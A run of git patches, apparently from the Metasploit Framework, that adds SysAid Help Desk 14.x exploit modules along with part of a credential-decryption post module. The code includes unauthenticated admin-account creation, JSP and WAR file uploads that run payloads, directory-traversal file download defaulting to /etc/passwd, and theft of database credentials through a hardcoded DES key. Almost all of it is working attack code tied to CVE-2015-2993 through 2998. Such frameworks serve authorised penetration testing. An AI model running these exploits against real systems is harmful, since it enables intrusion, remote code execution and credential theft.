+      parse_content(creds_tbl, content).each do |cred|
+        creds_tbl << cred
       end
     end
 
-    if not creds_tbl.rows.empty?
+    if creds_tbl.rows.empty?
+      print_status("No creds collected.")
+    else
       path = store_loot(
         'razor.user.creds',
         'text/csv',
@@ -70,8 +111,6 @@ class Metasploit3 < Msf::Post
       )
       print_line(creds_tbl.to_s)
       print_status("User credentials stored in: #{path}")
-    else
-      print_error("No data collected")
     end
   end
 
@@ -86,9 +125,8 @@ class Metasploit3 < Msf::Post
     return content
   end
 
-  def parse_content(table, content, username)
+  def parse_content(table, content)
     creds = []
-    print_line("Account: #{username}\n")
     content = content.split(/\(\(Z~\]/)
     content.each do |db|
       database = (db.scan(/database=(.*)/).flatten[0] || '').strip
@@ -100,19 +138,22 @@ class Metasploit3 < Msf::Post
       pass     = (db.scan(/password=(.*)/).flatten[0] ||'').strip
 
       # Decrypt if there's a password
-      pass = decrypt(pass) if not pass.empty?
+      decrypted_pass = decrypt(pass) unless pass.blank?
+
+      pass = decrypted_pass ? decrypted_pass : pass
 
       # Store data
       creds << [user, pass, type, host, port, dbname, database]
 
-      # Reort auth info while dumping data
-      report_auth_info(
-        :host  => host,
-        :port  => port,
-        :sname => database,
-        :user  => user,
-        :pass  => pass,
-        :type  => 'password'
+      # Don't report if there's nothing to report
+      next if user.blank? && pass.blank?
+
+      report_cred(
+        ip: rhost,
+        port: port.to_i,
+        service_name: database,
+        user: user,
+        password: pass
       )
     end
 
@@ -140,10 +181,16 @@ class Metasploit3 < Msf::Post
       "a" => "<" , "Y" => ">" , "'" => "'" , "^" => "^" , "{" => "{" ,
       "}" => "}" , "[" => "[" , "]" => "]" , "~" => "~" , "`" => "`"
     }
-    password=''
+    password = ''
     for letter in encrypted_password.chomp.each_char
-      password << magic_key[letter]
+      char = magic_key[letter]
+
+      # If there's a nil, it indicates our decryption method does not work for this version.
+      return nil if char.nil?
+
+      password << char
     end
+
     return password
   end
 end

From 765077d74190a56266b4a95d146754d29c2f2190 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 21:38:43 +0100
Subject: [PATCH 0293/1013] Create sysaid_admin_acct.rb

---
 .../auxiliary/admin/http/sysaid_admin_acct.rb | 89 +++++++++++++++++++
 1 file changed, 89 insertions(+)
 create mode 100644 modules/auxiliary/admin/http/sysaid_admin_acct.rb

diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
new file mode 100644
index 0000000000..08e764db8e
--- /dev/null
+++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'SysAid Help Desk Administrator Account Creation',
+      'Description' => %q{
+        This module exploits a vulnerability in SysAid Help Desk that allows an
+        unauthenticated user to create an administrator account. Note that this
+        exploit will only work once! Any subsequent attempts will fail.
+        This module has been tested on SysAid 14.4 in Windows and Linux.
+        },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', 'CVE-2015-2993' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          [ 'URL', 'TODO_FULLDISC_URL' ]
+        ],
+      'DisclosureDate' => 'Jun 3 2015'))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 8080]),
+        OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
+        OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
+        OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password'])
+      ], self.class)
+  end
+
+
+  def run
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'createnewaccount'),
+      'method' =>'GET',
+      'vars_get' => {
+        'accountID' => Rex::Text.rand_text_numeric(4),
+        'organizationName' => Rex::Text.rand_text_alpha(rand(4) + rand(8)),
+        'userName' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'masterPassword' => 'master123'
+      }
+    })
+    if res && res.code == 200 && res.body.to_s =~ /Error while creating account/
+      # No way to know whether this worked or not, it always says error
+      print_good("#{peer} - Created administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      service_data = {
+        address: rhost,
+        port: rport,
+        service_name: (ssl ? 'https' : 'http'),
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+      credential_data = {
+        origin_type: :service,
+        module_fullname: self.fullname,
+        private_type: :password,
+        private_data: datastore['PASSWORD'],
+        username: datastore['USERNAME']
+      }
+
+      credential_data.merge!(service_data)
+      credential_core = create_credential(credential_data)
+      login_data = {
+        core: credential_core,
+        access_level: 'Administrator',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+    else
+      print_error("#{peer} - Administrator account creation failed")
+    end
+  end
+end

From 193b7bcd2e689bd6fd3b2c049e29febc7493c9d6 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 21:44:02 +0100
Subject: [PATCH 0294/1013] Create sysaid_auth_file_upload.rb

---
 .../multi/http/sysaid_auth_file_upload.rb     | 282 ++++++++++++++++++
 1 file changed, 282 insertions(+)
 create mode 100644 modules/exploits/multi/http/sysaid_auth_file_upload.rb

diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
new file mode 100644
index 0000000000..68be18ebf4
--- /dev/null
+++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
@@ -0,0 +1,282 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'SysAid Help Desk Administrator Portal Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a file upload vulnerability in SysAid Help Desk.
+        The vulnerability exists in the ChangePhoto.jsp in the administrator portal,
+        which does not handle correctly directory traversal sequences and does not
+        enforce file extension restrictions. You need to have an administrator account,
+        but there is a Metasploit auxiliary module that can create one for you.
+        This module has been tested in SysAid v14.4 in both Linux and Windows.
+      },
+      'Author'       =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', 'CVE-2015-2994' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          [ 'URL', 'TODO_FULLDISC_URL' ]
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 5 },
+      'Privileged'  => false,
+      'Platform'    => %w{ linux win },
+      'Targets'     =>
+        [
+          [ 'Automatic', { } ],
+          [ 'SysAid Help Desk v14.4 / Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'SysAid Help Desk v14.4 / Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 3 2015'))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 8080]),
+        OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'Password for the specified username']),
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'errorInSignUp.htm'),
+      'method' => 'GET'
+    })
+    if res && res.code == 200 && res.body.to_s =~ /css\/master\.css\?v([0-9]{1,2})\.([0-9]{1,2})/
+      major = $1.to_i
+      minor = $2.to_i
+      if major == 14 && minor == 4
+        return Exploit::CheckCode::Appears
+      elsif major > 14
+        return Exploit::CheckCode::Safe
+      end
+    end
+    # Haven't tested in versions < 14.4, so we don't know if they are vulnerable or not
+    return Exploit::CheckCode::Unknown
+  end
+
+
+  def authenticate
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'Login.jsp'),
+      'method' => 'POST',
+      'vars_post' => {
+        'userName' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+    if res && res.code == 302 && res.get_cookies
+      return res.get_cookies
+    else
+      return nil
+    end
+  end
+
+
+  def upload_payload(payload, is_exploit)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload,
+      "application/octet-stream", 'binary',
+      "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(8))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(10))}.jsp\"")
+
+    data = post_data.to_s
+
+    if is_exploit
+      print_status("#{peer} - Uploading payload...")
+    end
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'ChangePhoto.jsp'),
+      'method' => 'POST',
+      'cookie' => @cookie,
+      'data'   => data,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'vars_get' => { 'isUpload' => 'true' }
+    })
+
+    if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/
+      if is_exploit
+        print_status("#{peer} - Payload uploaded successfully")
+      end
+      return $1
+    else
+      return nil
+    end
+  end
+
+
+  def pick_target
+    return target if target.name != 'Automatic'
+
+    print_status("#{peer} - Determining target")
+    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    url = upload_payload(os_finder_payload, false)
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], url),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
+    })
+
+    if res && res.code == 200
+      if res.body.to_s =~ /Linux/
+        register_files_for_cleanup('webapps/' + url)
+        return targets[1]
+      elsif res.body.to_s =~ /Windows/
+        register_files_for_cleanup('root/' + url)
+        return targets[2]
+      end
+    end
+
+    return nil
+  end
+
+
+  def generate_jsp_payload
+    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
+    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
+    exe = generate_payload_exe(opts)
+    base64_exe = Rex::Text.encode_base64(exe)
+
+    native_payload_name = rand_text_alpha(rand(6)+3)
+    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
+
+    var_raw     = rand_text_alpha(rand(8) + 3)
+    var_ostream = rand_text_alpha(rand(8) + 3)
+    var_buf     = rand_text_alpha(rand(8) + 3)
+    var_decoder = rand_text_alpha(rand(8) + 3)
+    var_tmp     = rand_text_alpha(rand(8) + 3)
+    var_path    = rand_text_alpha(rand(8) + 3)
+    var_proc2   = rand_text_alpha(rand(8) + 3)
+
+    if @my_target['Platform'] == 'linux'
+      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
+      chmod = %Q|
+      Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
+      Thread.sleep(200);
+      |
+
+      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
+      cleanup = %Q|
+      Thread.sleep(200);
+      Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
+      |
+    else
+      chmod = ''
+      cleanup = ''
+    end
+
+    jsp = %Q|
+    <%@page import="java.io.*"%>
+    <%@page import="sun.misc.BASE64Decoder"%>
+    <%
+    try {
+      String #{var_buf} = "#{base64_exe}";
+      BASE64Decoder #{var_decoder} = new BASE64Decoder();
+      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
+
+      File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
+      String #{var_path} = #{var_tmp}.getAbsolutePath();
+
+      BufferedOutputStream #{var_ostream} =
+        new BufferedOutputStream(new FileOutputStream(#{var_path}));
+      #{var_ostream}.write(#{var_raw});
+      #{var_ostream}.close();
+      #{chmod}
+      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
+      #{cleanup}
+    } catch (Exception e) {
+    }
+    %>
+    |
+
+    jsp = jsp.gsub(/\n/, '')
+    jsp = jsp.gsub(/\t/, '')
+    jsp = jsp.gsub(/\x0d\x0a/, "")
+    jsp = jsp.gsub(/\x0a/, "")
+
+    return jsp
+  end
+
+
+  def exploit_native
+
+
+    return jsp_name
+  end
+
+
+  def exploit
+    @cookie = authenticate
+    if not @cookie
+      print_error("#{peer} - Unable to authenticate with the provided credentials.")
+      return
+    else
+      print_status("#{peer} - Authentication was successful with the provided credentials.")
+    end
+
+    @my_target = pick_target
+    if @my_target.nil?
+      print_error("#{peer} - Unable to select a target, we must bail.")
+      return
+    else
+      print_status("#{peer} - Selected target #{@my_target.name}")
+    end
+
+    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
+    # Fail if this is the case and ask the user to select an appropriate payload.
+    if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/
+      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
+    end
+
+    jsp_payload = generate_jsp_payload
+    jsp_path = upload_payload(jsp_payload, true)
+    if not jsp_path
+      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
+    end
+
+    if @my_target == targets[1]
+      register_files_for_cleanup('webapps/' + jsp_path)
+    else
+      register_files_for_cleanup('root/' + jsp_path)
+    end
+
+    print_status("#{peer} - Executing payload...")
+    send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_path),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
+    })
+  end
+end

From 62993c35d3cd8ba25efb26d8f8ec3534cbe6ccce Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 21:45:14 +0100
Subject: [PATCH 0295/1013] Create sysaid_rdslogs_fle_upload.rb

---
 .../multi/http/sysaid_rdslogs_fle_upload.rb   | 127 ++++++++++++++++++
 1 file changed, 127 insertions(+)
 create mode 100644 modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
new file mode 100644
index 0000000000..752e9ec7fd
--- /dev/null
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'zlib'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'SysAid Help Desk rdslogs Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
+        The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
+        file uploads and handles zip file contents in a insecure way. Combining both weaknesses
+        a remote attacker can accomplish remote code execution. Note that this will only work if the
+        target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection
+        against null byte injection in file names. This module has been tested successfully on version
+        v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid
+        seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability
+        from being exploited.
+      },
+      'Author'       =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', 'CVE-2015-2995' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          [ 'URL', 'FULLDISC_URL' ]
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Privileged'  => false,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 3 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptInt.new('SLEEP',
+          [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
+        OptString.new('TARGETURI',
+          [true, 'Base path to the SysAid application', '/sysaid/'])
+      ], self.class)
+  end
+
+
+  def check
+    servlet_path = 'rdslogs'
+    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'vars_get' => {
+        'rdsName' => bogus_file
+      }
+    })
+    if res and res.code == 200
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+
+  def exploit
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    tomcat_path = '../../../../'
+    servlet_path = 'rdslogs'
+
+    # We need to create the upload directories before our first attempt to upload the WAR.
+    print_status("#{peer} - Creating upload directory")
+    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+    send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
+      'ctype' => 'application/xml',
+      'vars_get' => {
+        'rdsName' => bogus_file
+      }
+    })
+
+    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
+    print_status("#{peer} - Uploading WAR file...")
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(war_payload),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'rdsName' => tomcat_path + app_base + ".war" + "\x00"
+      }
+    })
+
+    # The server either returns a 200 OK when the upload is successful.
+    if res and (res.code == 200)
+      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
+      " seconds for deployment")
+      register_files_for_cleanup("webapps/" + app_base + ".war")
+      sleep(datastore['SLEEP'])
+    else
+      fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
+    end
+
+    print_status("#{peer} - Executing payload, wait for session...")
+    send_request_cgi({
+      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+      'method' => 'GET'
+    })
+  end
+end

From 72b7982e7ae4849ad56a76c60fe239c181124463 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 21:46:13 +0100
Subject: [PATCH 0296/1013] Create sysaid_file_

---
 modules/auxiliary/admin/http/sysaid_file_ | 150 ++++++++++++++++++++++
 1 file changed, 150 insertions(+)
 create mode 100644 modules/auxiliary/admin/http/sysaid_file_

diff --git a/modules/auxiliary/admin/http/sysaid_file_ b/modules/auxiliary/admin/http/sysaid_file_
new file mode 100644
index 0000000000..38bd0f6af7
--- /dev/null
+++ b/modules/auxiliary/admin/http/sysaid_file_
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "SysAid Help Desk Arbitrary File Download",
+      'Description' => %q{
+        This module exploits two vulnerabilities in SysAid Help Desk that allows
+        an unauthenticated user to download arbitrary files from the system. First an
+        information disclosure vulnerability (CVE-2015-2997) is used to obtain the file
+        system path, and then we abuse a directory traversal (CVE-2015-2996) to download
+        the file. Note that there are some limitations on Windows: 1) the information
+        disclosure vulnerability doesn't work; 2) we can only traverse the current drive,
+        so if you enter C:\afile.txt and the server is running on D:\ the file will not
+        be downloaded. This module has been tested with SysAid 14.4 on Windows and Linux.
+        },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', 'CVE-2015-2996' ],
+          [ 'CVE', 'CVE-2015-2997' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          [ 'URL', 'TODO_FULLDISC_URL' ]
+        ],
+      'DisclosureDate' => 'Jun 3 2015'))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 8080]),
+        OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
+        OptString.new('FILEPATH', [false, 'Path of the file to download (escape Windows paths with 4 back slashes)', '/etc/passwd']),
+      ], self.class)
+  end
+
+
+  def get_traversal_path
+    print_status("#{peer} - Trying to find out the traversal path...")
+    large_traversal = '../' * rand(15...30)
+    servlet_path = 'getAgentLogFile'
+
+    # We abuse getAgentLogFile to obtain the
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)),
+        'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))
+      }
+    })
+
+    if res && res.code == 200
+      if res.body.to_s =~ /\<H2\>(.*)\<\/H2\>/
+        error_path = $1
+        # Error_path is something like:
+        # /var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../ajkdnjhdfn/1421678611732.zip
+        # This calculates how much traversal we need to do to get to the root.
+        position = error_path.index(large_traversal)
+        if position != nil
+          return "../" * (error_path[0,position].count('/') - 2)
+        end
+      end
+    end
+  end
+
+
+  def download_file (download_path)
+    begin
+      return send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'),
+        'vars_get' => {
+          'fileName' => download_path
+        },
+      })
+    rescue Rex::ConnectionRefused
+      print_error("#{peer} - Could not connect.")
+      return
+    end
+  end
+
+
+  def run
+    # No point to continue if filepath is not specified
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error("Please supply the path of the file you want to download.")
+      return
+    else
+      print_status("#{peer} - Downloading file #{datastore['FILEPATH']}")
+      if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/
+        filepath = $3
+      else
+        filepath = datastore['FILEPATH']
+      end
+    end
+
+    traversal_path = get_traversal_path
+    if traversal_path == nil
+      print_error("#{peer} - Could not get traversal path, using bruteforce to download the file")
+      count = 1
+      while count < 15
+        res = download_file(("../" * count) + filepath)
+        if res && res.code == 200
+          if res.body.to_s.bytesize != 0
+            break
+          end
+        end
+        count += 1
+      end
+    else
+      res = download_file(traversal_path[0,traversal_path.length - 1] + filepath)
+    end
+
+    if res && res.code == 200
+      if res.body.to_s.bytesize != 0
+        vprint_line(res.body.to_s)
+        fname = File.basename(datastore['FILEPATH'])
+
+        path = store_loot(
+          'sysaid.http',
+          'application/octet-stream',
+          datastore['RHOST'],
+          res.body,
+          fname
+        )
+        print_good("File saved in: #{path}")
+      else
+        print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
+      end
+    else
+      print_error("#{peer} - Failed to download file.")
+    end
+  end
+end

From 6683b86822aae6ab1b64f9154316a73e01992bdd Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 21:46:48 +0100
Subject: [PATCH 0297/1013] Create sysaid_sql_creds.rb

---
 .../auxiliary/admin/http/sysaid_sql_creds.rb  | 148 ++++++++++++++++++
 1 file changed, 148 insertions(+)
 create mode 100644 modules/auxiliary/admin/http/sysaid_sql_creds.rb

diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
new file mode 100644
index 0000000000..d059b7861f
--- /dev/null
+++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'openssl'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "SysAid Help Desk Database Credentials Disclosure",
+      'Description' => %q{
+        This module exploits a vulnerability in SysAid Help Desk that allows
+        an unauthenticated user to download arbitrary files from the system. This is
+        used to download the server configuration file that contains the database username
+        and password, which is encrypted with a fixed key.
+        This module has been tested with SysAid 14.4 on Windows and Linux.
+        },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', 'CVE-2015-2996' ],
+          [ 'CVE', 'CVE-2015-2998' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          [ 'URL', 'TODO_FULLDISC_URL' ]
+        ],
+      'DisclosureDate' => 'Jun 3 2015'))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 8080]),
+        OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
+      ], self.class)
+  end
+
+
+  def decrypt_password (ciphertext)
+    salt = [-87, -101, -56, 50, 86, 53, -29, 3].pack('c*')
+    cipher = OpenSSL::Cipher::Cipher.new("DES")
+    base_64_code = Rex::Text.decode_base64(ciphertext)
+    cipher.decrypt
+    cipher.pkcs5_keyivgen 'inigomontoya', salt, 19
+
+    plaintext = cipher.update base_64_code
+    plaintext << cipher.final
+    plaintext
+  end
+
+
+  def run
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'),
+        'vars_get' => {
+          'fileName' => '../conf/serverConf.xml'
+        },
+      })
+    rescue Rex::ConnectionRefused
+      print_error("#{peer} - Could not connect.")
+      return
+    end
+
+    if res && res.code == 200 && res.body.to_s.bytesize != 0
+      username = /\<dbUser\>(.*)\<\/dbUser\>/.match(res.body.to_s)
+      encrypted_password = /\<dbPassword\>(.*)\<\/dbPassword\>/.match(res.body.to_s)
+      database_url = /\<dbUrl\>(.*)\<\/dbUrl\>/.match(res.body.to_s)
+      database_type = /\<dbType\>(.*)\<\/dbType\>/.match(res.body.to_s)
+
+      if username && encrypted_password && database_type && database_url
+        username = username.captures[0]
+        encrypted_password = encrypted_password.captures[0]
+        database_url = database_url.captures[0]
+        database_type = database_type.captures[0]
+        password = decrypt_password(encrypted_password[6..encrypted_password.length])
+        credential_core = report_credential_core({
+           password: password,
+           username: username
+        })
+
+        matches = /(\w*):(\w*):\/\/(.*)\/(\w*)/.match(database_url)
+        if matches
+          begin
+            if database_url['localhost'] == 'localhost'
+              db_address = rhost
+            else
+              db_address = matches.captures[2]
+              db_address = (db_address.index(':') ? db_address[0, db_address.index(':')] : db_address)
+              db_address = Rex::Socket.getaddress(db_address, true)
+            end
+            database_login_data = {
+              address: db_address,
+              service_name: database_type,
+              protocol: 'tcp',
+              workspace_id: myworkspace_id,
+              core: credential_core,
+              status: Metasploit::Model::Login::Status::UNTRIED
+            }
+            create_credential_login(database_login_data)
+          # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname
+          rescue SocketError
+            print_error "Could not resolve database server hostname."
+          end
+
+          print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}")
+          return
+        end
+      end
+      print_error("#{peer} - Failed to obtain database credentials, response was:")
+      print_line(res.body.to_s)
+    else
+      print_error("#{peer} - Failed to obtain database credentials.")
+    end
+  end
+
+
+  def report_credential_core(cred_opts={})
+    origin_service_data = {
+      address: rhost,
+      port: rport,
+      service_name: (ssl ? 'https' : 'http'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: self.fullname,
+      private_type: :password,
+      private_data: cred_opts[:password],
+      username: cred_opts[:username]
+    }
+
+    credential_data.merge!(origin_service_data)
+    create_credential(credential_data)
+  end
+end

From 42e84cd7d59c14649c01c3932ddf2713f9487998 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 3 Jun 2015 21:59:04 +0100
